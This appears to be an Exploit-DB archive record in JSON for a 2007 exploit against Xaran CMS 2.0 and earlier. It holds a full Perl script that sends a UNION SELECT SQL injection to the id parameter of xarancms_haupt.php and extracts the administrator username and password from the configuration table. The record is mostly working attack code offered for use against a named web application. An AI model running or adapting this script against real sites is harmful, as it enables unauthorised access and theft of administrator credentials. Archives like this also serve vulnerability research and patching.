Xaran CMS <= 2.0 xarancms_haupt.php SQL Injection Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:3298", "cvelist": [], "modified": "2007-02-13T00:00:00", "lastseen": "2016-01-31T18:09:32", "edition": 1, "sourceData": "#!/usr/bin/perl\n#[Script Name: Xaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n#[Coded by : ajann\n#[Author : ajann\n#[Contact : :(\n#[S.Page : http://www.xarancms.de\n#[$$ : 149.00 EUR\n#[.. : ajann,Turkey\n\nuse IO::Socket;\nif(@ARGV < 1){\nprint \"\n[========================================================================\n[// \tXaran Cms <= V2.0 (xarancms_haupt.php) Remote SQL Injection Exploit\n[// Usage: exploit.pl [target]\n[// Example: exploit.pl victim.com\n[// Example: exploit.pl victim.com\n[// Vuln&Exp : ajann\n[========================================================================\n\";\nexit();\n}\n#Local variables\n$server = $ARGV[0];\n$server =~ s/(http:\\/\\/)//eg;\n$host = \"http://\".$server;\n$port = \"80\";\n$file = \"/xarancms_haupt.php?id=\";\n\nprint \"Script <DIR> : \";\n$dir = <STDIN>;\nchop ($dir);\n\nif ($dir =~ /exit/){\nprint \"-- Exploit Failed[You Are Exited] \\n\";\nexit();\n}\n\nif ($dir =~ /\\//){}\nelse {\nprint \"-- Exploit Failed[No DIR] \\n\";\nexit();\n }\n\n\n$target = \"-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),konfiguration_benutzername,char(32,112,97,115,115,119,111,114,100,58),konfiguration_benutzerkennwort)%20from%20xarancms_konfiguration\";\n$target = $host.$dir.$file.$target;\n\n#Writing data to socket\nprint \"+**********************************************************************+\\n\";\nprint \"+ Trying to connect: $server\\n\";\n$socket = IO::Socket::INET->new(Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"$port\") || die \"\\n+ Connection failed...\\n\";\nprint $socket \"GET $target HTTP/1.1\\n\";\nprint $socket \"Host: $server\\n\";\nprint $socket \"Accept: */*\\n\";\nprint $socket \"Connection: close\\n\\n\";\nprint \"+ Connected!...\\n\";\n#Getting\nwhile($answer = <$socket>) {\nif ($answer =~ /letzte Aktualisierung: username:(.*?) pass/){\nprint \"+ Exploit succeed! Getting admin information.\\n\";\nprint \"+ ---------------- +\\n\";\nprint \"+ Username: $1\\n\";\n}\n\nif ($answer =~ /password:(.*?)<\\/div>/){\nprint \"+ Password: $1\\n\";\n}\n\nif ($answer =~ /Syntax error/) { \nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n\nif ($answer =~ /Internal Server Error/) {\nprint \"+ Exploit Failed : ( \\n\";\nprint \"+**********************************************************************+\\n\";\nexit(); \n}\n }\n\n# milw0rm.com [2007-02-13]\n", "published": "2007-02-13T00:00:00", "href": "https://www.exploit-db.com/exploits/3298/", "osvdbidlist": [], "reporter": "ajann", "hash": "bcc48f18b2f0143e5b447f6d5301a4dfd524b5f38df65eae0e093b5c2b926e05", "title": "Xaran CMS <= 2.0 xarancms_haupt.php SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Xaran Cms <= 2.0 (xarancms_haupt.php) SQL Injection Exploit. Webapps exploit for php platform", "references": [], "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/3298/", "enchantments": {"vulnersScore": 2.6}}